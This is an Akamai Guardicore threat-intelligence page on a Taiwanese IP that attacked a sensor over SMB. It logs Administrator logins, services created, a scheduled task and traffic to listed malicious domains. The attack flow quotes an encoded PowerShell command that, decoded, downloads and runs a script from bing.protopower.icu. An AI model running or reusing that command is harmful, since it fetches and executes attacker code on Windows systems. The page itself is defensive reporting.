Cyber Threat Intelligence

Discover malicious IPs and domains with Akamai Guardicore Segmentation

IP Address: 220.137.57.215Malicious

IP Address: 220.137.57.215Malicious

This IP address attempted an attack on a machine in our threat sensors network

Threat Information

Role

Attacker, Scanner

Services Targeted

SMB

Tags

Outgoing Connection CMD Successful SMB Login DNS Query Scheduled Task Creation Service Start SMB Null Session Login Access Suspicious Domain IDS - A Network Trojan was detected PowerShell Listening SMB SMB Share Connect File Operation By CMD Service Creation

Associated Attack Servers

awsglobalaccelerator.com bing.protopower.icu

99.83.154.118

Basic Information

IP Address

220.137.57.215

Domain

-

ISP

-

Country

Taiwan, Province of China

WHOIS

Created Date

-

Updated Date

-

Organization

-

First seen in Akamai Guardicore Segmentation

2023-04-08

Last seen in Akamai Guardicore Segmentation

2023-04-08

What is Akamai Guardicore Segmentation
Akamai Guardicore Segmentation is a data center and cloud security solution that protects the organization's core assets, using flexible, quickly deployed and easy to understand micro-segmentation controls. Akamai Guardicore Segmentation generates in-context security incidents, with details on attacker tools and techniques, that help IR teams prioritize incident investigation and reduce dwell time. Learn More

Attack Flow

A user logged in using SMB with the following username: Administrator - Authentication policy: Reached Max Attempts

Successful SMB Login

IDS detected A Network Trojan was detected : Powershell Activity Over SMB - Likely Lateral Movement

IDS - A Network Trojan was detected

c:\windows\system32\services.exe installed and started as a service named tplQ under service group None

Service Start Service Creation

The command line powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYgBpAG4AZwAuAHAAcgBvAHQAbwBwAG8AdwBlAHIALgBpAGMAdQAvAGMAbwBrADkALgBqAHMAJwApAA== was scheduled to run by modifying C:\Windows\System32\Tasks\AutFree

Process netsvcs Service Group started listening on ports: 65531 and 65532

Listening

A user logged in using SMB with the following username: Administrator - Authentication policy: Previously Approved User 6 times

Successful SMB Login

c:\windows\system32\services.exe installed and started as a service named vQBF under service group None

Service Start Service Creation

c:\windows\system32\services.exe installed and started as a service named OWFL under service group None

Service Start Service Creation

PowerShell session started by c:\windows\system32\windowspowershell\v1.0\powershell.exe

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe attempted to access suspicious domains: awsglobalaccelerator.com and bing.protopower.icu

DNS Query Access Suspicious Domain Outgoing Connection

Process c:\windows\system32\windowspowershell\v1.0\powershell.exe generated outgoing network traffic to: 99.83.154.118:80

Outgoing Connection

c:\windows\system32\services.exe installed and started as a service named GpRM under service group None

Service Start Service Creation

c:\windows\system32\services.exe installed and started as a service named akbF under service group None

Service Start Service Creation